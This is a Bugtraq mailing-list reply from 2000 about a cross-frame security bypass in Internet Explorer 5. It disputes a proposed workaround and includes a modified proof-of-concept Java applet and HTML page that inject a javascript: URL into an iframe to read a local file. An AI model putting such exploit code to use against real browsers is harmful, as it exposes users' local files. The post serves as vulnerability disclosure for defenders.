Bugtraq mailing list archives
Re: IE 5 security vulnerablity - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy)
From: takagi () ETL GO JP (TAKAGI, Hiromitsu)
Date: Fri, 21 Apr 2000 09:29:46 +0900
On Tue, 18 Apr 2000 16:20:48 +0300 Georgi Guninski <joro () NAT BG> wrote:
Georgi Guninski security advisory #10, 2000 IE 5 security vulnerablity - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy)
Usually, IE 5.x does not allow assigning "javascript:" urls to the location object because this is dangerous. But this may be circumvented with the help of the interaction between Java and the DOM/JavaScript.
I confirmed the vulnerability. But I have two comments against your report.
Note: This is NOT a bug in the Java language, this is a bug in Microsoft's implementation of Java in IE.
It is not a bug in implementation of "Java". The class JSObject that is the magic code of the vulnerability is not included in the standard Java API and is included in the package netscape.javascript that is an extension library provided by Netscape or Microsoft. So, it sounds better to say, "This is NOT a bug of Java, this is a bug in Microsoft's implementation of the extension Java package for JavaScript".
If you have Java enabled and Scripting of Java applets enabled, Active
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Scripting may be executed.
So, to really disable Active Scripting disable Active Scripting and disable Java and/or Scripting of Java applets.
^^
Workaround: Disable Java or disable Scripting of Java applets
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Disabling "Scripting of Java applets" seems to have no relation with the vulnerability. Your exploit code can be refined as the following code which does not use the function "Scripting of Java applets". This modified version of Guninski's demo is available here. http://java-house.etl.go.jp/~takagi/java/test/Guninski-jsinject-modified/ I confirmed that it is still vulnerable under disabling "Scripting of Java applets".
------jsinject.java--------------------------------
import java.applet.Applet; import netscape.javascript.*; public class jsinject extends Applet { public void start() { // ^^^^^^^ try { JSObject win = (JSObject)JSObject.getWindow(this); JSObject doc = (JSObject)win.getMember("document"); JSObject I1 = (JSObject)doc.getMember("I1"); JSObject loc = (JSObject)I1.getMember("location"); loc.setMember("href", getParameter("jscode")); } catch (Exception e) { e.printStackTrace(); } } }
---------------------------------------------------
------jsinject.html--------------------------------
<IFRAME ID="I1" NAME="I1" SRC="file://c:/test.txt"></IFRAME> <applet MAYSCRIPT code="jsinject"> <param name="jscode" value="javascript:alert(document.body.innerText)"> </applet>
---------------------------------------------------
-- Hiromitsu Takagi Electrotechnical Laboratory http://www.etl.go.jp/~takagi/
Current thread:
- IE 5 security vulnerablity - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy) Georgi Guninski (Apr 18)
- RFP2K03: Contemplations on dvwssr.dll and its affects on life rain forest puppy (Apr 20)
- Microsoft Security Bulletin (MS00-026) Microsoft Product Security (Apr 20)
- Re: IE 5 security vulnerablity - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy) TAKAGI, Hiromitsu (Apr 20)
- freebsd libncurses overflow Przemyslaw Frasunek (Apr 24)
- Re: freebsd libncurses overflow Kris Kennaway (Apr 24)
- Re: freebsd libncurses overflow Kris Kennaway (Apr 24)
- Re: freebsd libncurses overflow Przemyslaw Frasunek (Apr 25)
- freebsd libncurses overflow Przemyslaw Frasunek (Apr 24)
- Re: freebsd libncurses overflow Bill Fumerola (Apr 24)
- Re: freebsd libncurses overflow Theo de Raadt (Apr 26)
- Denial of Service Against pcAnywhere. Vacuum (Apr 25)